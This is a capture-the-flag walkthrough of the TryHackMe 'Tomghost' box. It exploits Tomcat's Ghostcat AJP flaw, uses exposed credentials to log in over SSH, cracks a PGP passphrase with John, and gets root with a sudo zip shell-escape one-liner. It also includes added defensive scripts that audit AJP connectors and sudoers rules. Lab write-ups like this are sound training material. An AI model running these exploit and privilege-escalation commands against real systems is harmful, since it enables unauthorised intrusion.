Tomghost THM

IP

10.10.11.196

Nmap initial

sudo nmap -sV -sC -A -oA nmap_initial 10.10.11.196

Nmap Full Scan

nmap -T4 -p- -oA nmap_full 10.10.11.196
  • nothing interesting

Ports

22:SSH

53:DNS

8009:AJP13 Apache Jserv

8080:HTTP Apache Tomcat 9.0.30

Port 8080 HTTP

When we navigate to port 8080 we are greeted with what looks like a default Apache Tomcat home page

Since we know the version let's see if we can hunt down an exploit.

It seems that this Apache Tomcat version is vulnerable to CVE-2020-1938 ("Ghostcat"), a file read/inclusion vulnerability in the AJP connector (port 8009) of Apache Tomcat. A remote, unauthenticated attacker can exploit this vulnerability to read the web application's configuration files. In instances where file upload is allowed, an attacker could upload malicious JavaServer Pages (JSP) code within a variety of file types and trigger this vulnerability to gain remote code execution (RCE).
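The root cause described above is an AJP connector that listens on all interfaces with no shared secret, which is how Tomcat shipped before 9.0.31. The following is an added defensive example, not part of the original write-up or of any Tomcat tooling: it parses a constructed `server.xml` and flags AJP connectors that are neither bound to loopback nor protected by a `secret`, which is the configuration a hardened install should have if AJP is needed at all.

```python
import xml.etree.ElementTree as ET

# Constructed sample of a pre-9.0.31-style Tomcat server.xml (not the target's file).
# The AJP connector has no address binding and no secret, so it is reachable by anyone
# who can hit port 8009.
SAMPLE_SERVER_XML = """<?xml version="1.0" encoding="UTF-8"?>
<Server port="8005" shutdown="SHUTDOWN">
  <Service name="Catalina">
    <Connector port="8080" protocol="HTTP/1.1" connectionTimeout="20000" redirectPort="8443" />
    <Connector port="8009" protocol="AJP/1.3" redirectPort="8443" />
  </Service>
</Server>
"""

# Constructed hardened variant: bound to loopback and requiring a shared secret.
# "CHANGE-ME-PLACEHOLDER" is an obvious placeholder, not a real secret.
HARDENED_SERVER_XML = """<?xml version="1.0" encoding="UTF-8"?>
<Server port="8005" shutdown="SHUTDOWN">
  <Service name="Catalina">
    <Connector port="8080" protocol="HTTP/1.1" connectionTimeout="20000" redirectPort="8443" />
    <Connector port="8009" protocol="AJP/1.3" address="127.0.0.1"
               secretRequired="true" secret="CHANGE-ME-PLACEHOLDER" redirectPort="8443" />
  </Service>
</Server>
"""

LOOPBACK_ADDRESSES = {"127.0.0.1", "::1", "localhost"}


def audit_ajp_connectors(server_xml: str) -> list:
    """Return one finding per AJP connector found in the given server.xml text.

    A connector is marked exposed when it is not bound to a loopback address
    AND carries no shared secret. A missing 'address' attribute means Tomcat
    binds to all interfaces, which is the dangerous default.
    """
    root = ET.fromstring(server_xml)
    findings = []
    for connector in root.iter("Connector"):
        protocol = connector.get("protocol", "HTTP/1.1")
        if not protocol.upper().startswith("AJP/"):
            continue
        address = connector.get("address")
        has_secret = bool(connector.get("secret"))
        bound_to_loopback = address in LOOPBACK_ADDRESSES
        findings.append({
            "port": connector.get("port"),
            "address": address or "0.0.0.0 (all interfaces)",
            "has_secret": has_secret,
            "exposed": not bound_to_loopback and not has_secret,
        })
    return findings


def has_exposed_ajp(server_xml: str) -> bool:
    """Convenience wrapper: True if any AJP connector in the file is exposed."""
    return any(f["exposed"] for f in audit_ajp_connectors(server_xml))


if __name__ == "__main__":
    for label, xml_text in (("default", SAMPLE_SERVER_XML), ("hardened", HARDENED_SERVER_XML)):
        for finding in audit_ajp_connectors(xml_text):
            print(label, finding)
```

Run it against a real `conf/server.xml` by reading the file into `audit_ajp_connectors`. The cleanest fix when AJP is not used by a front-end proxy is to remove the connector entirely; where it is needed, bind it to loopback and set `secretRequired="true"` with a real `secret`, as Tomcat 9.0.31 and later do by default.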

We can use the following repo to exploit this vulnerability.

Within the repo we have CVE-2020-1938.py. To exploit Tomcat we can run the script against the server:

python2 CVE-2020-1938.py -p 8009 10.10.11.196

We can now read the web configuration file. Looks like we have a user and password:

skyfuck:8730281lkjlkjdqlksalks

Let's see if we can SSH in:

ssh skyfuck@10.10.11.196
  • it works!!

Privilege escalation via skyfuck

id
  • nothing interesting

sudo privileges
  • nothing interesting

Within skyfuck's home directory, we do find some interesting files:

  • credential.pgp

  • tryhackme.asc

Let's download the files and enumerate them further.

Download to the local host:

scp skyfuck@10.10.69.186:/home/skyfuck/credential.pgp .
scp skyfuck@10.10.69.186:/home/skyfuck/tryhackme.asc . 

What we can do is brute force the passphrase of the tryhackme.asc key. To do this we first need to convert the key file to a John-compatible hash using gpg2john:

gpg2john tryhackme.asc > hash.txt

Now we can brute force the hash and retrieve the passphrase:

john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

We now have the passphrase:

alexandru

Now back to the remote host.

We need to import the key and decrypt the PGP file (the passphrase recovered above is requested during decryption):

gpg --import tryhackme.asc
gpg --decrypt credential.pgp

merlin:asuyusdoiuqoilkda312j31k2j123j1g23g12k3g12kj3gk12jg3k12j3kj123j

Awesome, we have merlin's password. Let's switch user to merlin:

su merlin

Privilege escalation via merlin

Let's check our sudo privileges:

sudo -l
  • Looks like we can run the zip command as root with no password. We can check GTFOBins for a way to abuse this.

TF=$(mktemp -u)
sudo zip $TF /etc/hosts -T -TT 'sh #'
sudo rm $TF
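The misconfiguration that made this step possible is a NOPASSWD sudo rule for a binary that can spawn a shell. As an added defensive example (not part of the original write-up), the following script parses a constructed sudoers fragment and flags exactly that pattern. The entry set `SHELL_CAPABLE` contains only `zip`, the case on this page; an administrator would extend it from GTFOBins for their own environment.

```python
import re

# Constructed sudoers fragment for illustration; not the target's real /etc/sudoers.
SAMPLE_SUDOERS = """
Defaults        env_reset
root    ALL=(ALL:ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
merlin  ALL=(root) NOPASSWD: /usr/bin/zip
alice   ALL=(root) /usr/bin/systemctl restart tomcat9
"""

# Binaries that can hand the caller an interactive shell when run as root.
# Only zip (this page's case) is listed; extend from GTFOBins for a real audit.
SHELL_CAPABLE = {"zip"}

# user  host=(runas) [NOPASSWD:] command[, command...]
ENTRY_RE = re.compile(r"^(?P<user>\S+)\s+(?P<host>\S+)=\((?P<runas>[^)]*)\)\s*(?P<spec>.+)$")


def parse_sudoers(text: str) -> list:
    """Parse user specification lines into dicts; Defaults, comments and aliases are skipped."""
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or line.startswith("Defaults"):
            continue
        match = ENTRY_RE.match(line)
        if not match:
            continue
        spec = match.group("spec")
        nopasswd = "NOPASSWD:" in spec
        # Strip the tag and split the comma-separated command list.
        commands = [c.strip() for c in re.sub(r"NOPASSWD:|PASSWD:", "", spec).split(",") if c.strip()]
        entries.append({
            "user": match.group("user"),
            "runas": match.group("runas"),
            "nopasswd": nopasswd,
            "commands": commands,
        })
    return entries


def audit_sudoers(text: str) -> list:
    """Return findings for NOPASSWD rules whose command is a shell-capable binary."""
    findings = []
    for entry in parse_sudoers(text):
        if not entry["nopasswd"]:
            continue
        for cmd in entry["commands"]:
            binary = cmd.split()[0].rsplit("/", 1)[-1]
            if binary in SHELL_CAPABLE:
                findings.append({
                    "user": entry["user"],
                    "runas": entry["runas"],
                    "binary": binary,
                    "command": cmd,
                    "reason": "NOPASSWD rule for a binary that can spawn a shell",
                })
    return findings


if __name__ == "__main__":
    for finding in audit_sudoers(SAMPLE_SUDOERS):
        print(finding)
```

Running it with the real file (`sudo cat /etc/sudoers /etc/sudoers.d/*` piped in) gives a quick list of rules to remove or restrict; the fix for the entry above is to drop the rule or replace `zip` with a wrapper script that takes no attacker-controlled arguments.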

We are now root!